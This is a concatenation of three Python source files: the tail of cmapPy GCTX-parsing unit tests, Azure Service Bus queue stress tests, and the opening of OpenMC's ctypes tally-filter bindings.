cid_unsorted = ['LJP007_MCF7_24H:TRT_POSCON:BRD-K81418486:10','LJP007_MCF10A_24H:TRT_CP:BRD-K93918653:3.33']
mg17 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests//mini_gctoo_for_testing.gctx",
cid = cid_unsorted, sort_col_meta= False)
pandas_testing.assert_frame_equal(mg17.data_df, mg1.data_df.iloc[:, [2,0]])
pandas_testing.assert_frame_equal(mg17.col_metadata_df, mg1.col_metadata_df.iloc[[2,0],:])
pandas_testing.assert_frame_equal(mg17.row_metadata_df, mg1.row_metadata_df)
# test with sort_row_meta False and rid
rid_unsorted = ['LJP007_MCF7_24H:TRT_CP:BRD-K64857848:10', 'MISC003_A375_24H:TRT_CP:BRD-K93918653:3.33']
mg18 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx",
rid = rid_unsorted, sort_row_meta=False)
pandas_testing.assert_frame_equal(mg18.data_df, mg1.data_df.iloc[[5,1], :])
pandas_testing.assert_frame_equal(mg18.col_metadata_df, mg1.col_metadata_df)
pandas_testing.assert_frame_equal(mg18.row_metadata_df, mg1.row_metadata_df.iloc[[5,1],:])
def test_parse_rid_as_entrez_id(self):
input_file = "cmapPy/pandasGEXpress/tests/functional_tests/test_parse_gctx_rid_entrez_id.gctx"
g = parse_gctx.parse(input_file)
self.assertEqual((5, 5), g.data_df.shape)
logger.debug("g.data_df.index: {}".format(g.data_df.index))
my_rids = ["5720", "55847", "7416"]
g = parse_gctx.parse(input_file, rid=my_rids)
self.assertEqual((3, 5), g.data_df.shape)
logger.debug("g.data_df.index: {}".format(g.data_df.index))
my_rids = [str(x) for x in my_rids]
logger.debug("using rid as str (mismatched type) - my_rids: {}".format(my_rids))
g = parse_gctx.parse(input_file, rid=my_rids)
self.assertEqual((3, 5), g.data_df.shape)
logger.debug("g.data_df.index: {}".format(g.data_df.index))
def test_check_and_order_id_inputs(self):
ridx = [0, 1]
cidx = [2, 1]
rid = ["a", "b", "c"]
cid = ["l", "m", "n", "o"]
row_meta = pd.DataFrame(index=["b", "c", "a", "d"])
col_meta = pd.DataFrame(index=["l", "m", "n", "o", "p", "q"])
# case 1: row and col lists are populated and same type
self.assertEqual((sorted(ridx), sorted(cidx)),
parse_gctx.check_and_order_id_inputs(None, ridx, None, cidx, row_meta, col_meta, sort_row_meta = True, sort_col_meta = True))
# case 2: row & col lists are populated, but of different types
self.assertEqual((sorted(ridx), [0, 1, 2, 3]),
parse_gctx.check_and_order_id_inputs(None, ridx, cid, None, row_meta, col_meta, sort_row_meta = True, sort_col_meta = True))
# case 3: row list and col lists are both None
self.assertEqual(([0, 1, 2, 3], [0, 1, 2, 3, 4, 5]),
parse_gctx.check_and_order_id_inputs(None, None, None, None, row_meta, col_meta, sort_row_meta = True, sort_col_meta = True))
# case 4: row list is populated, col list is None
self.assertEqual(([0, 1, 2], [0, 1, 2, 3, 4, 5]),
parse_gctx.check_and_order_id_inputs(rid, None, None, None, row_meta, col_meta, sort_row_meta = True, sort_col_meta = True))
def test_check_id_idx_exclusivity(self):
ids = ["a", "b", "c"]
idx = [0, 1, 2]
# case 1: id != None and idx != None
with self.assertRaises(Exception) as context:
parse_gctx.check_id_idx_exclusivity(ids, idx)
self.assertTrue("'id' and 'idx' fields can't both not be None" in str(context.exception))
# case 2: id != None
self.assertEqual(("id", ids), parse_gctx.check_id_idx_exclusivity(ids, None))
# case 3: idx != None
self.assertEqual(("idx", idx), parse_gctx.check_id_idx_exclusivity(None, idx))
# case 4: id == None & idx == None
self.assertEqual((None, []), parse_gctx.check_id_idx_exclusivity(None, None))
def test_parse_metadata_df(self):
mini_gctoo = mini_gctoo_for_testing.make()
# convert row_metadata to np.nan
mini_row_meta = mini_gctoo.row_metadata_df.replace([-666, "-666", -666.0], [np.nan, np.nan, np.nan])
logger.debug("mini_row_meta.shape: {}".format(mini_row_meta.shape))
logger.debug("mini_row_meta.index: {}".format(mini_row_meta.index))
logger.debug("mini_row_meta.columns: {}".format(mini_row_meta.columns))
logger.debug("mini_row_meta.dtypes: {}".format(mini_row_meta.dtypes))
gctx_file = h5py.File("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx", "r")
row_dset = gctx_file[row_meta_group_node]
col_dset = gctx_file[col_meta_group_node]
# with convert_neg_666
row_df = parse_gctx.parse_metadata_df("row", row_dset, True)
logger.debug("row_df.dtypes: {}".format(row_df.dtypes))
pandas_testing.assert_frame_equal(mini_row_meta, row_df)
# no convert_neg_666
mini_gctoo_with_neg_666 = mini_gctoo_for_testing.make(convert_neg_666=False)
col_df = parse_gctx.parse_metadata_df("col", col_dset, False)
pandas_testing.assert_frame_equal(mini_gctoo_with_neg_666.col_metadata_df, col_df)
# test that ID's are not converted to numeric
expected_rids = [str(i) for i in range(3)]
row_dset = {"id": MockHdf5Dset(expected_rids, str),
"other_meta": MockHdf5Dset(range(3, 6), str)}
r = parse_gctx.parse_metadata_df("row", row_dset, True)
logger.debug("test that ID's are not converted to numeric - r: {}".format(r))
logger.debug("r.index: {}".format(r.index))
self.assertEqual(set(expected_rids), set(r.index))
def test_replace_666(self):
# convert_neg_666 is True
row_df = pd.DataFrame([[3, "a"], [-666, "c"], ["-666", -666.0]],
index=["r1", "r2", "r3"], columns=["rhd1", "rhd2"])
e_df = pd.DataFrame([[3, "a"], [np.nan, "c"], [np.nan, np.nan]],
index=["r1", "r2", "r3"], columns=["rhd1", "rhd2"])
out_df = parse_gctx.replace_666(row_df, convert_neg_666=True)
self.assertTrue(e_df.equals(out_df))
# convert_neg_666 is False
e_df2 = pd.DataFrame([[3, "a"], ["-666", "c"], ["-666", "-666"]],
index=["r1", "r2", "r3"], columns=["rhd1", "rhd2"])
out_df2 = parse_gctx.replace_666(row_df, convert_neg_666=False)
self.assertTrue(e_df2.equals(out_df2))
# edge case: if row meta is 1 column of floats
row_df3 = pd.DataFrame([[3], [-666], [-666.0]],
index=["r1", "r2", "r3"], columns=["rhd3"])
e_df3 = pd.DataFrame([[3], [np.nan], [np.nan]],
index=["r1", "r2", "r3"], columns=["rhd3"])
out_df3 = parse_gctx.replace_666(row_df3, convert_neg_666=True)
self.assertTrue(e_df3.equals(out_df3))
def test_set_metadata_index_and_column_names(self):
mini_gctoo = mini_gctoo_for_testing.make()
mini_gctoo.row_metadata_df.index.name = None
mini_gctoo.row_metadata_df.columns.name = None
mini_gctoo.col_metadata_df.index.name = None
mini_gctoo.col_metadata_df.columns.name = None
# case 1: dim == "row"
parse_gctx.set_metadata_index_and_column_names("row", mini_gctoo.row_metadata_df)
self.assertEqual(mini_gctoo.row_metadata_df.index.name, "rid")
self.assertEqual(mini_gctoo.row_metadata_df.columns.name, "rhd")
# case 2: dim == "col"
parse_gctx.set_metadata_index_and_column_names("col", mini_gctoo.col_metadata_df)
self.assertEqual(mini_gctoo.col_metadata_df.index.name, "cid")
self.assertEqual(mini_gctoo.col_metadata_df.columns.name, "chd")
def test_get_ordered_idx(self):
mg = mini_gctoo_for_testing.make()
# case 1: id_type == None
case1 = parse_gctx.get_ordered_idx(None, [], mg.row_metadata_df, sort_idx = True)
self.assertEqual(case1, list(range(0, 6)),
"Expected ordered idx to be {} but got {}".format(list(range(0, 6)), case1))
# case 2: id_type == "id"
case2 = parse_gctx.get_ordered_idx("id",
['LJP007_MCF7_24H:CTL_VEHICLE:DMSO:-666'], mg.col_metadata_df, sort_idx = True)
self.assertEqual(case2, [4],
"Expected ordered idx to be {} but got {}".format([4], case2))
# case 3: id_type == ridx
case3 = parse_gctx.get_ordered_idx("idx",
[5, 1, 3], mg.col_metadata_df, sort_idx = True)
self.assertEqual(case3, [1, 3, 5],
"Expected ordered idx to be {} but got {}".format([1, 3, 5], case3))
def test_parse_data_df(self):
mini_data_df = pd.DataFrame([[-0.283359, 0.011270], [0.304119, 1.921061], [0.398655, -0.144652]],
index=["200814_at", "218597_s_at", "217140_s_at"],
columns=["LJP005_A375_24H:DMSO:-666", "LJP005_A375_24H:BRD-K76908866:10"])
mini_data_df = mini_data_df.astype(np.float32)
mini_data_df.index.name = "rid"
mini_data_df.columns.name = "cid"
# create h5py File instance
mini_gctx = h5py.File("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctx_with_metadata_n2x3.gctx", "r")
data_dset = mini_gctx[data_node]
# get relevant metadata fields
col_meta = parse_gctx.get_column_metadata("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctx_with_metadata_n2x3.gctx")
row_meta = parse_gctx.get_row_metadata("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctx_with_metadata_n2x3.gctx")
# case 1: no subsetting
data_df1 = parse_gctx.parse_data_df(data_dset, [0, 1, 2], [0, 1], row_meta, col_meta)
# note: checks to 3 decimal places
pandas_testing.assert_frame_equal(mini_data_df, data_df1,
check_exact=False, check_less_precise=True)
# case 2: subset; ridx < cidx
data_df2 = parse_gctx.parse_data_df(data_dset, [0], [0, 1], row_meta, col_meta)
pandas_testing.assert_frame_equal(mini_data_df.iloc[[0], [0, 1]], data_df2,
check_exact=False, check_less_precise=True)
# case 3: subset; ridx == cidx
data_df3 = parse_gctx.parse_data_df(data_dset, [0], [0], row_meta, col_meta)
pandas_testing.assert_frame_equal(mini_data_df.iloc[[0], [0]], data_df3,
check_exact=False, check_less_precise=True)
# case 4: subset; ridx > cidx
data_df4 = parse_gctx.parse_data_df(data_dset, [0, 1, 2], [0], row_meta, col_meta)
pandas_testing.assert_frame_equal(mini_data_df.iloc[[0, 1, 2], [0]], data_df4,
check_exact=False, check_less_precise=True)
mini_gctx.close()
def test_convert_ids_to_meta_type(self):
# happy path
id_list = [0, 1, 2]
self.assertEqual(int, type(id_list[0]))
df = pd.DataFrame({}, index=pd.Series(range(1, 4)).astype(np.int64))
r = parse_gctx.convert_ids_to_meta_type(id_list, df)
logger.debug("conversion from regular int to numpy int64 - type(r[0]): {}".format(type(r[0])))
self.assertEqual(np.int64, type(r[0]))
id_list = [str(i) for i in range(3)]
r = parse_gctx.convert_ids_to_meta_type(id_list, df)
logger.debug("conversion from str to numpy int64 - type(r[0]): {}".format(type(r[0])))
self.assertEqual(np.int64, type(r[0]))
# unhappy path
id_list[0] = "a"
with self.assertRaises(Exception) as context:
parse_gctx.convert_ids_to_meta_type(id_list, df)
logger.debug("context.exception: {}".format(context.exception))
self.assertIn(
"The type of the id_list (rid or cid) being used to subset the data is not compatible with the metadata id's in the file",
str(context.exception))
def test_check_idx_validity(self):
id_list = [0,1,2]
df = pd.DataFrame({}, index=range(5))
logger.debug("df.shape: {}".format(df.shape))
parse_gctx.check_idx_validity(id_list, df, sort_id = True)
id_list[0] = -1
with self.assertRaises(Exception) as context:
parse_gctx.check_idx_validity(id_list, df, sort_id = True)
logger.debug("context.exception: {}".format(context.exception))
self.assertIn("some of indexes being used to subset the data are not valid", str(context.exception))
self.assertIn("[-1]", str(context.exception))
invalid_high = df.shape[0] + 1
id_list[0] = invalid_high
with self.assertRaises(Exception) as context:
parse_gctx.check_idx_validity(id_list, df, sort_id = True)
logger.debug("context.exception: {}".format(context.exception))
self.assertIn("some of indexes being used to subset the data are not valid", str(context.exception))
self.assertIn("[{}]".format(invalid_high), str(context.exception))
def test_check_id_validity(self):
id_list = ["a", "b", "c"]
df = pd.DataFrame({}, index=["a", "b", "c", "d"])
parse_gctx.check_id_validity(id_list, df)
id_list[0] = "z"
with self.assertRaises(Exception) as context:
parse_gctx.check_id_validity(id_list, df)
logger.debug("context.exception: {}".format(context.exception))
self.assertIn(
"some of the ids being used to subset the data are not present in the metadata for the file being parsed",
str(context.exception))
if __name__ == "__main__":
setup_logger.setup(verbose=True)
unittest.main()
|
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
from datetime import timedelta
import time
import os
import pytest
from dotenv import load_dotenv
#from argparse import ArgumentParser
from azure.servicebus import AutoLockRenewer, ServiceBusClient
from azure.servicebus._common.constants import ServiceBusReceiveMode
from app_insights_metric import AzureMonitorMetric
from stress_test_base import StressTestRunner, ReceiveType
ENV_FILE = os.environ.get('ENV_FILE')
load_dotenv(dotenv_path=ENV_FILE, override=True)
LOGGING_ENABLE = False
SERVICE_BUS_CONNECTION_STR = os.environ.get('SERVICE_BUS_CONNECTION_STR')
SERVICEBUS_QUEUE_NAME = os.environ.get('SERVICE_BUS_QUEUE_NAME')
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_send_and_receive():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration=timedelta(seconds=60),
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_send_and_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_send_and_pull_receive():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
receive_type=ReceiveType.pull,
duration=timedelta(seconds=60),
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_send_and_pull_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_batch_send_and_receive():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration=timedelta(seconds=60),
send_batch_size=5,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_batch_send_and_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_slow_send_and_receive():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration=timedelta(seconds=3501*3),
send_delay=3500,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_slow_send_and_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_receive_and_delete():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME, receive_mode=ServiceBusReceiveMode.RECEIVE_AND_DELETE)],
should_complete_messages = False,
duration=timedelta(seconds=60),
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_slow_send_and_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_unsettled_messages():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration = timedelta(seconds=350),
should_complete_messages = False,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_unsettled_messages")
)
result = stress_test.run()
# This test is prompted by reports of an issue where enough unsettled messages saturate a service-side cache
# and prevent further receipt.
assert(result.total_sent > 2500)
assert(result.total_received > 2500)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_receive_large_batch_size():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME, prefetch_count=50)],
duration = timedelta(seconds=60),
max_message_count = 50,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_receive_large_batch_size")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
# Cannot be defined at local scope due to pickling into multiproc runner.
class ReceiverTimeoutStressTestRunner(StressTestRunner):
def on_send(self, state, sent_message, sender):
'''Called on every successful send'''
if state.total_sent % 10 == 0:
# To make receive time out, in push mode this delay would trigger receiver reconnection
time.sleep(self.max_wait_time + 5)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_pull_receive_timeout():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = ReceiverTimeoutStressTestRunner(
senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
max_wait_time = 5,
receive_type=ReceiveType.pull,
duration=timedelta(seconds=600),
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_pull_receive_timeout")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
class LongRenewStressTestRunner(StressTestRunner):
def on_receive(self, state, received_message, receiver):
'''Called on every successful receive'''
renewer = AutoLockRenewer()
renewer.register(receiver, received_message, max_lock_renewal_duration=300)
time.sleep(300)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_long_renew_send_and_receive():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = LongRenewStressTestRunner(
senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration=timedelta(seconds=3000),
send_delay=300,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_long_renew_send_and_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
class LongSessionRenewStressTestRunner(StressTestRunner):
def on_receive(self, state, received_message, receiver):
'''Called on every successful receive'''
renewer = AutoLockRenewer()
def on_fail(renewable, error):
print("FAILED AUTOLOCKRENEW: " + str(error))
renewer.register(receiver, receiver.session, max_lock_renewal_duration=600, on_lock_renew_failure=on_fail)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_long_renew_session_send_and_receive():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
session_id = 'test_stress_queue_long_renew_send_and_receive'
stress_test = LongSessionRenewStressTestRunner(
senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME, session_id=session_id)],
duration=timedelta(seconds=3000),
send_delay=300,
send_session_id=session_id,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_long_renew_session_send_and_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
class Peekon_receiveStressTestRunner(StressTestRunner):
def on_receive_batch(self, state, received_message, receiver):
'''Called on every successful receive'''
assert receiver.peek_messages()[0]
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_peek_messages():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = Peekon_receiveStressTestRunner(
senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration = timedelta(seconds=300),
receive_delay = 30,
receive_type = ReceiveType.none,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_peek_messages")
)
result = stress_test.run()
assert(result.total_sent > 0)
# TODO: This merits better validation, to be implemented alongside full metric spread.
class RestartHandlerStressTestRunner(StressTestRunner):
def post_receive(self, state, receiver):
'''Called after completion of every successful receive'''
if state.total_received % 3 == 0:
receiver.__exit__()
receiver.__enter__()
def on_send(self, state, sent_message, sender):
'''Called after completion of every successful receive'''
if state.total_sent % 3 == 0:
sender.__exit__()
sender.__enter__()
@pytest.mark.liveTest
@pytest.mark.live_test_only
@pytest.mark.skip(reason='This test is disabled unless re-openability of handlers is desired and re-enabled')
def test_stress_queue_close_and_reopen():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = RestartHandlerStressTestRunner(
senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration = timedelta(seconds=300),
receive_delay = 30,
send_delay = 10,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_close_and_reopen")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
# This test validates that all individual messages are received contiguously over a long time period.
# (e.g. not dropped for whatever reason, not sent, or not received)
class DroppedMessageCheckerStressTestRunner(StressTestRunner):
def on_receive(self, state, received_message, receiver):
'''Called on every successful receive'''
last_seen = getattr(state, 'last_seen', -1)
noncontiguous = getattr(state, 'noncontiguous', set())
body = int(str(received_message))
if body == last_seen+1:
last_seen += 1
if noncontiguous:
while (last_seen+1) in noncontiguous:
last_seen += 1
noncontiguous.remove(last_seen)
else:
noncontiguous.add(body)
state.noncontiguous = noncontiguous
state.last_seen = last_seen
def pre_process_message_body(self, payload):
'''Called when constructing message body'''
try:
body = self._message_id
except:
_message_id = 0
body = 0
_message_id += 1
return str(body)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_check_for_dropped_messages():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = DroppedMessageCheckerStressTestRunner(
senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
receive_type=ReceiveType.pull,
duration=timedelta(seconds=3000),
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_check_for_dropped_messages")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
if __name__ == '__main__':
#parser = ArgumentParser()
pytest.main()
|
|
from collections.abc import Mapping
from ctypes import c_int, c_int32, c_double, c_char_p, POINTER, \
create_string_buffer, c_size_t
from weakref import WeakValueDictionary
import numpy as np
from numpy.ctypeslib import as_array
from openmc.exceptions import AllocationError, InvalidIDError
from . import _dll
from .core import _FortranObjectWithID
from .error import _error_handler
from .material import Material
from .mesh import RegularMesh
__all__ = [
'Filter', 'AzimuthalFilter', 'CellFilter', 'CellbornFilter', 'CellfromFilter',
'CellInstanceFilter', 'DistribcellFilter', 'DelayedGroupFilter', 'EnergyFilter',
'EnergyoutFilter', 'EnergyFunctionFilter', 'LegendreFilter', 'MaterialFilter',
'MeshFilter', 'MeshSurfaceFilter', 'MuFilter', 'ParticleFilter', 'PolarFilter',
'SphericalHarmonicsFilter', 'SpatialLegendreFilter', 'SurfaceFilter',
'UniverseFilter', 'ZernikeFilter', 'ZernikeRadialFilter', 'filters'
]
# Tally functions
_dll.openmc_cell_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_int32)), POINTER(c_int32)]
_dll.openmc_cell_filter_get_bins.restype = c_int
_dll.openmc_cell_filter_get_bins.errcheck = _error_handler
_dll.openmc_energy_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_double)), POINTER(c_size_t)]
_dll.openmc_energy_filter_get_bins.restype = c_int
_dll.openmc_energy_filter_get_bins.errcheck = _error_handler
_dll.openmc_energy_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_double)]
_dll.openmc_energy_filter_set_bins.restype = c_int
_dll.openmc_energy_filter_set_bins.errcheck = _error_handler
_dll.openmc_energyfunc_filter_set_data.restype = c_int
_dll.openmc_energyfunc_filter_set_data.errcheck = _error_handler
_dll.openmc_energyfunc_filter_set_data.argtypes = [
c_int32, c_size_t, POINTER(c_double), POINTER(c_double)]
_dll.openmc_energyfunc_filter_get_energy.resttpe = c_int
_dll.openmc_energyfunc_filter_get_energy.errcheck = _error_handler
_dll.openmc_energyfunc_filter_get_energy.argtypes = [
c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))]
_dll.openmc_energyfunc_filter_get_y.resttpe = c_int
_dll.openmc_energyfunc_filter_get_y.errcheck = _error_handler
_dll.openmc_energyfunc_filter_get_y.argtypes = [
c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))]
_dll.openmc_filter_get_id.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_filter_get_id.restype = c_int
_dll.openmc_filter_get_id.errcheck = _error_handler
_dll.openmc_filter_get_type.argtypes = [c_int32, c_char_p]
_dll.openmc_filter_get_type.restype = c_int
_dll.openmc_filter_get_type.errcheck = _error_handler
_dll.openmc_filter_set_id.argtypes = [c_int32, c_int32]
_dll.openmc_filter_set_id.restype = c_int
_dll.openmc_filter_set_id.errcheck = _error_handler
_dll.openmc_get_filter_index.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_get_filter_index.restype = c_int
_dll.openmc_get_filter_index.errcheck = _error_handler
_dll.openmc_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_legendre_filter_get_order.restype = c_int
_dll.openmc_legendre_filter_get_order.errcheck = _error_handler
_dll.openmc_legendre_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_legendre_filter_set_order.restype = c_int
_dll.openmc_legendre_filter_set_order.errcheck = _error_handler
_dll.openmc_material_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_int32)), POINTER(c_size_t)]
_dll.openmc_material_filter_get_bins.restype = c_int
_dll.openmc_material_filter_get_bins.errcheck = _error_handler
_dll.openmc_material_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_int32)]
_dll.openmc_material_filter_set_bins.restype = c_int
_dll.openmc_material_filter_set_bins.errcheck = _error_handler
_dll.openmc_mesh_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_mesh_filter_get_mesh.restype = c_int
_dll.openmc_mesh_filter_get_mesh.errcheck = _error_handler
_dll.openmc_mesh_filter_set_mesh.argtypes = [c_int32, c_int32]
_dll.openmc_mesh_filter_set_mesh.restype = c_int
_dll.openmc_mesh_filter_set_mesh.errcheck = _error_handler
_dll.openmc_meshsurface_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_meshsurface_filter_get_mesh.restype = c_int
_dll.openmc_meshsurface_filter_get_mesh.errcheck = _error_handler
_dll.openmc_meshsurface_filter_set_mesh.argtypes = [c_int32, c_int32]
_dll.openmc_meshsurface_filter_set_mesh.restype = c_int
_dll.openmc_meshsurface_filter_set_mesh.errcheck = _error_handler
_dll.openmc_new_filter.argtypes = [c_char_p, POINTER(c_int32)]
_dll.openmc_new_filter.restype = c_int
_dll.openmc_new_filter.errcheck = _error_handler
_dll.openmc_spatial_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_spatial_legendre_filter_get_order.restype = c_int
_dll.openmc_spatial_legendre_filter_get_order.errcheck = _error_handler
_dll.openmc_spatial_legendre_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_spatial_legendre_filter_set_order.restype = c_int
_dll.openmc_spatial_legendre_filter_set_order.errcheck = _error_handler
_dll.openmc_sphharm_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_sphharm_filter_get_order.restype = c_int
_dll.openmc_sphharm_filter_get_order.errcheck = _error_handler
_dll.openmc_sphharm_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_sphharm_filter_set_order.restype = c_int
_dll.openmc_sphharm_filter_set_order.errcheck = _error_handler
_dll.openmc_zernike_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_zernike_filter_get_order.restype = c_int
_dll.openmc_zernike_filter_get_order.errcheck = _error_handler
_dll.openmc_zernike_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_zernike_filter_set_order.restype = c_int
_dll.openmc_zernike_filter_set_order.errcheck = _error_handler
_dll.tally_filters_size.restype = c_size_t
class Filter(_FortranObjectWithID):
__instances = WeakValueDictionary()
def __new__(cls, obj=None, uid=None, new=True, index=None):
mapping = filters
if index is None:
if new:
# Determine ID to assign
if uid is None:
uid = max(mapping, default=0) + 1
else:
if uid in mapping:
raise AllocationError('A filter with ID={} has already '
'been allocated.'.format(uid))
# Set the filter type -- note that the filter_type attribute
# only exists on subclasses!
index = c_int32()
_dll.openmc_new_filter(cls.filter_type.encode(), index)
index = index.value
else:
index = mapping[uid]._index
if index not in cls.__instances:
instance = super().__new__(cls)
instance._index = index
if uid is not None:
instance.id = uid
cls.__instances[index] = instance
return cls.__instances[index]
@property
def id(self):
filter_id = c_int32()
_dll.openmc_filter_get_id(self._index, filter_id)
return filter_id.value
@id.setter
def id(self, filter_id):
_dll.openmc_filter_set_id(self._index, filter_id)
class EnergyFilter(Filter):
filter_type = 'energy'
